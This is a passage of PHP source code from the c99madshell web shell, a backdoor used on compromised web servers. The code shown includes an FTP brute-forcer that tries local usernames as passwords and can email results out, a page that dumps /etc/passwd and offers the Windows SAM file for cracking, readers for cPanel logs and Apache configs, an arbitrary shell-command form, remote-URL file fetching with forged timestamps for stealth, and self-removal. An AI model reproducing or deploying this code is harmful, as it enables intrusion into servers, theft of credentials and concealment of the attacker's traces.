  1344.   function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
  1345.   {
  1346.    if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));}
  1347.    else {$TRUE = TRUE;}
  1348.    if ($TRUE)
  1349.    {
  1350.     $sock = @ftp_connect($host,$port,$timeout);
  1351.     if (@ftp_login($sock,$login,$pass))
  1352.     {
  1353.      echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
  1354.      ob_flush();
  1355.      return TRUE;
  1356.     }
  1357.    }
  1358.   }
  1359.   if (!empty($submit))
  1360.   {
  1361.    if (isset($_POST['fqb_lenght'])) $fqb_lenght = $_POST['fqb_lenght'];
  1362.    if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
  1363.    $fp = fopen("/etc/passwd","r");
  1364.    if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
  1365.    else
  1366.    {
  1367.     if (isset($_POST['fqb_logging'])) $fqb_logging = $_POST['fqb_logging'];
  1368.     if ($fqb_logging)
  1369.     {
  1370.      if (isset($_POST['fqb_logfile'])) $fqb_logging = $_POST['fqb_logfile'];
  1371.      if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
  1372.      else {$fqb_logfp = FALSE;}
  1373.      $fqb_log = "FTP Quick Brute (called c99madshell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n";
  1374.      if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
  1375.     }
  1376.     ob_flush();
  1377.     $i = $success = 0;
  1378.     $ftpquick_st = getmicrotime();
  1379.     while(!feof($fp))
  1380.     {
  1381.      $str = explode(":",fgets($fp,2048));
  1382.      if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
  1383.      {
  1384.       echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>";
  1385.       $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";
  1386.       if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
  1387.       $success++;
  1388.       ob_flush();
  1389.      }
  1390.      if ($i > $fqb_lenght) {break;}
  1391.      $i++;
  1392.     }
  1393.     if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";}
  1394.     $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
  1395.     echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>";
  1396.     $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
  1397.     if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
  1398.     if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);}
  1399.     fclose($fqb_logfp);
  1400.    }
  1401.   }
  1402.   else
  1403.   {
  1404.    $logfile = $tmpdir_logs."c99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log";
  1405.    $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
  1406.    echo "<form method=\"POST\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>";
  1407.   }
  1408.  }
  1409. }
  1410. if ($act == "d")
  1411. {
  1412.  if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";}
  1413.  else
  1414.  {
  1415.   echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
  1416.   if (!$win)
  1417.   {
  1418.    echo "<tr><td><b>Owner/Group</b></td><td> ";
  1419.    //$ow = posix_getpwuid(fileowner($d));
  1420.    //$gr = posix_getgrgid(filegroup($d));
  1421.    $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
  1422.   }
  1423.   echo "<tr><td><b>Perms</b></td><td><a href=\"#\" onclick=\"document.todo.act.value='chmod';document.todo.d.value='".urlencode($d)."';document.todo.submit();\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>";
  1424.  }
  1425. }
  1426. if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();}
  1427. if ($act == "security")
  1428. {
  1429.  echo "<center><b>Server security information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>";
  1430.  if (!$win)
  1431.  {
  1432.   if ($nixpasswd)
  1433.   {
  1434.    if ($nixpasswd == 1) {$nixpasswd = 0;}
  1435.    echo "<b>*nix /etc/passwd:</b><br>";
  1436.    if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
  1437.    if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
  1438.    echo "<form method=\"POST\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>";
  1439.    $i = $nixpwd_s;
  1440.    while ($i < $nixpwd_e)
  1441.    {
  1442.     $uid = posix_getpwuid($i);
  1443.     if ($uid)
  1444.     {
  1445.      $uid["dir"] = "<a href=\"#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".urlencode($uid["dir"])."';document.todo.submit();\">".$uid["dir"]."</a>";
  1446.      echo join(":",$uid)."<br>";
  1447.     }
  1448.     $i++;
  1449.    }
  1450.   }
  1451.   else {echo "<br><a href=\"#\" onclick=\"document.todo.act.value='security';document.todo.d.value='".$ud."';document.todo.nixpasswd.value='1';document.todo.submit();\"><b><u>Get /etc/passwd</u></b></a><br>";}
  1452.  }
  1453.  else
  1454.  {
  1455.   $v = $_SERVER["WINDIR"]."\repair\sam";
  1456.   if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";}
  1457.   else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='sam';document.todo.d.value='".$_SERVER["WINDIR"]."\/repair';document.todo.ft.value='download';document.todo.submit();\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";}
  1458.  }
  1459.  if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='userdomains';document.todo.d.value='".urlencode("/etc")."';document.todo.ft.value='txt';document.todo.submit();\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
  1460.  if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='accounting.log';document.todo.d.value='".urlencode("/var/cpanel/")."';document.todo.ft.value='txt';document.todo.submit();\"><u><b>View cpanel logs</b></u></a></font></b><br>";}
  1461.  if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='httpd.conf';document.todo.d.value='".urlencode("/usr/local/apache/conf")."';document.todo.ft.value='txt';document.todo.submit();\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
  1462.  if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='httpd.conf';document.todo.d.value='".urlencode("/etc")."';document.todo.ft.value='txt';document.todo.submit();\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
  1463.  if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='syslog.conf';document.todo.d.value='".urlencode("/etc")."';document.todo.ft.value='txt';document.todo.submit();\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";}
  1464.  if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='motd';document.todo.d.value='".urlencode("/etc")."';document.todo.ft.value='txt';document.todo.submit();\"><u><b>Message Of The Day</b></u></a></font></b><br>";}
  1465.  if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='hosts';document.todo.d.value='".urlencode("/etc")."';document.todo.ft.value='txt';document.todo.submit();\"><u><b>Hosts</b></u></a></font></b><br>";}
  1466.  function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}}
  1467.  displaysecinfo("OS Version?",myshellexec("cat /proc/version"));
  1468.  displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version"));
  1469.  displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net"));
  1470.  displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise"));
  1471.  displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo"));
  1472.  displaysecinfo("RAM",myshellexec("free -m"));
  1473.  displaysecinfo("HDD space",myshellexec("df -h"));
  1474.  displaysecinfo("List of Attributes",myshellexec("lsattr -a"));
  1475.  displaysecinfo("Mount options ",myshellexec("cat /etc/fstab"));
  1476.  displaysecinfo("Is cURL installed?",myshellexec("which curl"));
  1477.  displaysecinfo("Is lynx installed?",myshellexec("which lynx"));
  1478.  displaysecinfo("Is links installed?",myshellexec("which links"));
  1479.  displaysecinfo("Is fetch installed?",myshellexec("which fetch"));
  1480.  displaysecinfo("Is GET installed?",myshellexec("which GET"));
  1481.  displaysecinfo("Is perl installed?",myshellexec("which perl"));
  1482.  displaysecinfo("Where is apache",myshellexec("whereis apache"));
  1483.  displaysecinfo("Where is perl?",myshellexec("whereis perl"));
  1484.  displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf"));
  1485.  displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf"));
  1486.  displaysecinfo("locate my.conf",myshellexec("locate my.conf"));
  1487.  displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf"));
  1488. }
  1489. if ($act == "mkfile")
  1490. {
  1491.  if ($mkfile != $d)
  1492.  {
  1493.   if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
  1494.   elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
  1495.   else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}
  1496.  }
  1497.  else {$act = $dspact = "ls";}
  1498. }
  1499. if ($act == "fsbuff")
  1500. {
  1501.  $arr_copy = $sess_data["copy"];
  1502.  $arr_cut = $sess_data["cut"];
  1503.  $arr = array_merge($arr_copy,$arr_cut);
  1504.  if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}
  1505.  else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";}
  1506. }
  1507. if ($act == "selfremove")
  1508. {
  1509.  if (($submit == $rndcode) and ($submit != ""))
  1510.  {
  1511.   if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99madshell v.".$shver."!"; c99shexit(); }
  1512.   else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
  1513.  }
  1514.  else
  1515.  {
  1516.   if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";}
  1517.   $rnd = rand(0,9).rand(0,9).rand(0,9);
  1518.   echo "<form method=\"POST\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>";
  1519.  }
  1520. }
  1521. if ($act == "search")
  1522. {
  1523.  echo "<b>Search in file-system:</b><br>";
  1524.  if (empty($search_in)) {$search_in = $d;}
  1525.  if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
  1526.  if (empty($search_text_wwo)) {$search_text_regexp = 0;}
  1527.  if (!empty($submit))
  1528.  {
  1529.   $found = array();
  1530.   $found_d = 0;
  1531.   $found_f = 0;
  1532.   $search_i_f = 0;
  1533.   $search_i_d = 0;
  1534.   $a = array
  1535.   (
  1536.    "name"=>$search_name, "name_regexp"=>$search_name_regexp,
  1537.    "text"=>$search_text, "text_regexp"=>$search_text_regxp,
  1538.    "text_wwo"=>$search_text_wwo,
  1539.    "text_cs"=>$search_text_cs,
  1540.    "text_not"=>$search_text_not
  1541.   );
  1542.   $searchtime = getmicrotime();
  1543.   $in = array_unique(explode(";",$search_in));
  1544.   foreach($in as $v) {c99fsearch($v);}
  1545.   $searchtime = round(getmicrotime()-$searchtime,4);
  1546.   if (count($found) == 0) {echo "<b>No files found!</b>";}
  1547.   else
  1548.   {
  1549.    $ls_arr = $found;
  1550.    $disp_fullpath = TRUE;
  1551.    $act = "ls";
  1552.   }
  1553.  }
  1554.  echo "<form method=POST>
  1555. <input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\">
  1556. <b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp
  1557. <br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
  1558. <br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea>
  1559. <br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp
  1560. &nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only
  1561. &nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive
  1562. &nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text
  1563. <br><br><input type=submit name=submit value=\"Search\"></form>";
  1564.  if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";}
  1565. }
  1566. if ($act == "chmod")
  1567. {
  1568.  $mode = fileperms($d.$f);
  1569.  if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
  1570.  else
  1571.  {
  1572.   $form = TRUE;
  1573.   if ($chmod_submit)
  1574.   {
  1575.    $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
  1576.    if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";}
  1577.    else {$err = "Can't chmod to ".$octet.".";}
  1578.   }
  1579.   if ($form)
  1580.   {
  1581.    $perms = parse_perms($mode);
  1582.    echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
  1583.   }
  1584.  }
  1585. }
  1586. if ($act == "upload")
  1587. {
  1588.  $uploadmess = "";
  1589.  $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath);
  1590.  if (empty($uploadpath)) {$uploadpath = $d;}
  1591.  elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";}
  1592.  if (!empty($submit))
  1593.  {
  1594.   global $HTTP_POST_FILES;
  1595.   $uploadfile = $HTTP_POST_FILES["uploadfile"];
  1596.   if (!empty($uploadfile["tmp_name"]))
  1597.   {
  1598.    if (empty($uploadfilename)) {$destin = $uploadfile["name"];}
  1599.    else {$destin = $userfilename;}
  1600.    if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";}
  1601.   }
  1602.   elseif (!empty($uploadurl))
  1603.   {
  1604.    if (!empty($uploadfilename)) {$destin = $uploadfilename;}
  1605.    else
  1606.    {
  1607.     $destin = explode("/",$destin);
  1608.     $destin = $destin[count($destin)-1];
  1609.     if (empty($destin))
  1610.     {
  1611.      $i = 0;
  1612.      $b = "";
  1613.      while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
  1614.    }
  1615.    if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}
  1616.    else
  1617.    {
  1618.     $st = getmicrotime();
  1619.     $content = @file_get_contents($uploadurl);
  1620.     $dt = round(getmicrotime()-$st,4);
  1621.     if (!$content) {$uploadmess .=  "Can't download file!<br>";}
  1622.     else
  1623.     {
  1624.      if ($filestealth) {$stat = stat($uploadpath.$destin);}
  1625.      $fp = fopen($uploadpath.$destin,"w");
  1626.      if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";}
  1627.      else
  1628.      {
  1629.       fwrite($fp,$content,strlen($content));
  1630.       fclose($fp);
  1631.       if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
  1632.      }
  1633.     }
  1634.    }
  1635.   }
  1636.  }
  1637.  if ($miniform)
  1638.  {
  1639.   echo "<b>".$uploadmess."</b>";
  1640.   $act = "ls";
  1641.  }
  1642.  else
  1643.  {
  1644.   echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" method=POST><input type=\"hidden\" name=\"act\" value=\"upload\"><input type=\"hidden\" name=\"d\" value=\"".urlencode($d)."\">
  1645. Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br>
  1646. Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br>
  1647. Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br>
  1648. File-name (auto-fill): <input name=uploadfilename size=25><br><br>
  1649. <input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br>
  1650. <input type=submit name=submit value=\"Upload\">
  1651. </form>";
  1652.  }
  1653. }
  1654. if ($act == "delete")
  1655. {
  1656.  $delerr = "";
  1657.  foreach ($actbox as $v)
  1658.  {
  1659.   $result = FALSE;
  1660.   $result = fs_rmobj($v);
  1661.   if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
  1662.  }
  1663.  if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
  1664.  $act = "ls";
  1665. }
  1666. if (!$usefsbuff)
  1667. {
  1668.  if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";}
  1669. }
  1670. else
  1671. {
  1672.  if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; }
  1673.  elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";}
  1674.  elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";}
  1675.  if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);}
  1676.  elseif ($actpastebuff)
  1677.  {
  1678.   $psterr = "";
  1679.   foreach($sess_data["copy"] as $k=>$v)
  1680.   {
  1681.    $to = $d.basename($v);
  1682.    if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
  1683.    if ($copy_unset) {unset($sess_data["copy"][$k]);}
  1684.   }
  1685.   foreach($sess_data["cut"] as $k=>$v)
  1686.   {
  1687.    $to = $d.basename($v);
  1688.    if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
  1689.    unset($sess_data["cut"][$k]);
  1690.   }
  1691.   c99_sess_put($sess_data);
  1692.   if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
  1693.   $act = "ls";
  1694.  }
  1695.  elseif ($actarcbuff)
  1696.  {
  1697.   $arcerr = "";
  1698.   if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
  1699.   else {$ext = ".tar.gz";}
  1700.   if ($ext == ".tar.gz") {$cmdline = "tar cfzv";}
  1701.   $cmdline .= " ".$actarcbuff_path;
  1702.   $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
  1703.   foreach($objects as $v)
  1704.   {
  1705.    $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
  1706.    if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}
  1707.    if (is_dir($v))
  1708.    {
  1709.     if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
  1710.     $v .= "*";
  1711.    }
  1712.    $cmdline .= " ".$v;
  1713.   }
  1714.   $tmp = realpath(".");
  1715.   chdir($d);
  1716.   $ret = myshellexec($cmdline);
  1717.   chdir($tmp);
  1718.   if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";}
  1719.   $ret = str_replace("\r\n","\n",$ret);
  1720.   $ret = explode("\n",$ret);
  1721.   if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
  1722.   foreach($sess_data["cut"] as $k=>$v)
  1723.   {
  1724.    if (in_array($v,$ret)) {fs_rmobj($v);}
  1725.    unset($sess_data["cut"][$k]);
  1726.   }
  1727.   c99_sess_put($sess_data);
  1728.   if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
  1729.   $act = "ls";
  1730.  }
  1731.  elseif ($actpastebuff)
  1732.  {
  1733.   $psterr = "";
  1734.   foreach($sess_data["copy"] as $k=>$v)
  1735.   {
  1736.    $to = $d.basename($v);
  1737.    if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
  1738.    if ($copy_unset) {unset($sess_data["copy"][$k]);}
  1739.   }
  1740.   foreach($sess_data["cut"] as $k=>$v)
  1741.   {
  1742.    $to = $d.basename($v);
  1743.    if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
  1744.    unset($sess_data["cut"][$k]);
  1745.   }
  1746.   c99_sess_put($sess_data);
  1747.   if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
  1748.   $act = "ls";
  1749.  }
  1750. }
  1751. if ($act == "cmd")
  1752. {
  1753. if (trim($cmd) == "ps -aux") {$act = "processes";}
  1754. elseif (trim($cmd) == "tasklist") {$act = "processes";}
  1755. else
  1756. {
  1757.  @chdir($chdir);
  1758.  if (!empty($submit))
  1759.  {
  1760.   echo "<b>Result of execution this command</b>:<br>";
  1761.   $olddir = realpath(".");
  1762.   @chdir($d);
  1763.   $ret = myshellexec($cmd);
  1764.   $ret = convert_cyr_string($ret,"d","w");
  1765.   if ($cmd_txt)
  1766.   {
  1767.    $rows = count(explode("\r\n",$ret))+1;
  1768.    if ($rows < 10) {$rows = 10;}
  1769.    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
  1770.   }
  1771.   else {echo $ret."<br>";}
  1772.   @chdir($olddir);
  1773.  }
  1774.  else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}}
  1775.  echo "<form method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
  1776. }
  1777. }
  1778. if ($act == "ls")
  1779. {
  1780.  if (count($ls_arr) > 0) {$list = $ls_arr;}
  1781.  else
  1782.  {
  1783.   $list = array();
  1784.   if ($h = @opendir($d))
  1785.   {
  1786.    while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
  1787.    closedir($h);
  1788.   }
  1789.   else {}
  1790.  }
  1791.  if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";}
  1792.  else
  1793.  {
  1794.   //Building array
  1795.   $objects = array();
  1796.   $vd = "f"; //Viewing mode
  1797.   if ($vd == "f")
  1798.   {
  1799.    $objects["head"] = array();
  1800.    $objects["folders"] = array();
  1801.    $objects["links"] = array();
  1802.    $objects["files"] = array();
  1803.    foreach ($list as $v)
  1804.    {
  1805.     $o = basename($v);
  1806.     $row = array();
  1807.     if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";}
  1808.     elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";}
  1809.     elseif (is_dir($v))
  1810.     {
  1811.      if (is_link($v)) {$type = "LINK";}
  1812.      else {$type = "DIR";}
  1813.      $row[] = $v;
  1814.      $row[] = $type;
  1815.     }
  1816.     elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
  1817.     $row[] = filemtime($v);
  1818.     if (!$win)
  1819.     {
  1820.      //$ow = posix_getpwuid(fileowner($v));
  1821.      //$gr = posix_getgrgid(filegroup($v));
  1822.      $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
  1823.     }
  1824.     $row[] = fileperms($v);
  1825.     if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
  1826.     elseif (is_link($v)) {$objects["links"][] = $row;}
  1827.     elseif (is_dir($v)) {$objects["folders"][] = $row;}
